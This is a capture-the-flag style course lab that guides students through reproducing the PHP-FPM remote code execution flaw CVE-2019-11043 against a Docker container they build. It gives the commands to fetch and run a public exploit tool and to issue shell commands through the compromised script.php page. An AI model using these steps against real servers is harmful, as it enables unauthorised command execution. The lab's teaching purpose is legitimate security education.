ED 106: PHP-FPM Command Injection (15 pts extra)

What You Need for This Project

A Linux machine, such as a Google Cloud Debian server

Purpose

To understand Web templates and practice template injection attacks. This will also involve using Docker.

Task 1: Preparing the Target Server

Installing Docker

On your Linux machine, in a Terminal, execute these commands, one at a time:

sudo apt update sudo apt install apt-transport-https ca-certificates curl gnupg2 software-properties-common -y curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add - sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/debian $(lsb_release -cs) stable" sudo apt update sudo apt install docker-ce -y sudo systemctl status docker

You should see that docker is "active (running)", as shown in green letters in the image below.

Press Q to exit the status display.

Preparing the Playground Environment

On your Linux machine, in a Terminal, execute these commands, one at a time:

sudo apt install git -y git clone https://github.com/neex/phuip-fpizdam.git cd phuip-fpizdam/reproducer/ sudo docker build -t reproduce-cve-2019-11043 .

This builds the container. It takes about 20 minutes, while many pages of messages scroll by. There are long pauses. Wait until you see all 12 steps complete, as shown below.

Execute these command:

sudo docker run --rm -ti -p 8080:80 reproduce-cve-2019-11043

The server starts listening, as shown below.

Leave this Terminal window open.

Observing Listening Ports

Open a new SSH window to the same Linux server.

Execute these command:

sudo ss -pant

You see docker listening on port 8080, as shown below.

Opening a Port in the Google Cloud Firewall

In the Google Cloud Console, click the top left three-bar icon, scroll down to the NETWORKING secton, point to "VPC network", and click "Firewall rules", as shown below.

At the top center, click "CREATE FIREWALL RULE".

Enter these items, as shown below:

Name: allow8080
Targets: All instances in the network
Source IP ranges: 0.0.0.0/0
tcp: 8080

At the bottom of the page, click the Create button. The firewall rule appears, as shown below.

Connecting to your Server

In the Google Cloud Console, click the top left three-bar icon, scroll down to the COMPUTE secton, point to "Compute Engine", and click "VM instances".

Find the External IP for your server, as shown below.

Open a Web browser and go to this URL, replacing the IP address with the IP address of your server:

http://35.226.109.42:8080/script.php

The page is empty, as shown below.

Troubleshooting
If you are on the CCSF wireless network, it will probably block traffic on port 8080. Use a different network, or a VPN, or the "DangerZone" network in S37 to get past the firewall.

Task 2: The Attack

Installing Go

On your Linux server, in a Terminal window, execute these commands:

sudo apt update
sudo apt install curl -y

On your local computer, in a Web browser, go to

https://golang.org/dl/

Find the latest Linux 64-bit version, as shown below. Note the file name and the SHA265 checksum, outlined in green in the image below.

On your Linux server, in a Terminal window, execute these commands, adjusting the filename to match the filename you found in the previous step:

curl -O https://dl.google.com/go/go1.13.3.linux-amd64.tar.gz
sha256sum go1.13.3.linux-amd64.tar.gz

Make sure the SHA256 value matches the value on the website, as shown below.

On your Linux server, in a Terminal window, execute these commands, adjusting the filename to match the filename you found in the previous step:

tar xvf go1.13.3.linux-amd64.tar.gz
sudo chown -R root:root ./go
sudo mv go /usr/local
echo export GOPATH=$HOME/work >> ~/.profile
echo export PATH=\$PATH:/usr/local/go/bin:\$GOPATH/bin >> ~/.profile
source ~/.profile

Go runs, showing a help message, as shown below.

Running the Exploit

On your Linux server, execute these commands:

go get github.com/neex/phuip-fpizdam
phuip-fpizdam http://127.0.0.1:8080/script.php

The exploit runs, as shown below.

Using the PHP Shell

Now the script page acts as a PHP shell.

In a Web browser and go to this URL, replacing the IP address with the IP address of your server:

http://35.226.109.42:8080/script.php?a=id

The "id" command executes, as shown below.

Refresh the page several times--sometimes it works, and sometimes the page is empty. That is normal; this exploit only infects some of the php-fpm workers.

Flag ED 106.1: Linux Version (10 pts)

Execute the "uname -a" command on the server.

The flag is covered by a green rectangle in the image below.

Flag ED 106.2: HTML File (5 pts)

There is an HTML file in the /var/www/html directory.

Find that filename. It's the flag.

References

PHuiP-FPizdaM

Posted 10-31-19
Duplicate docker command removed 11-8-19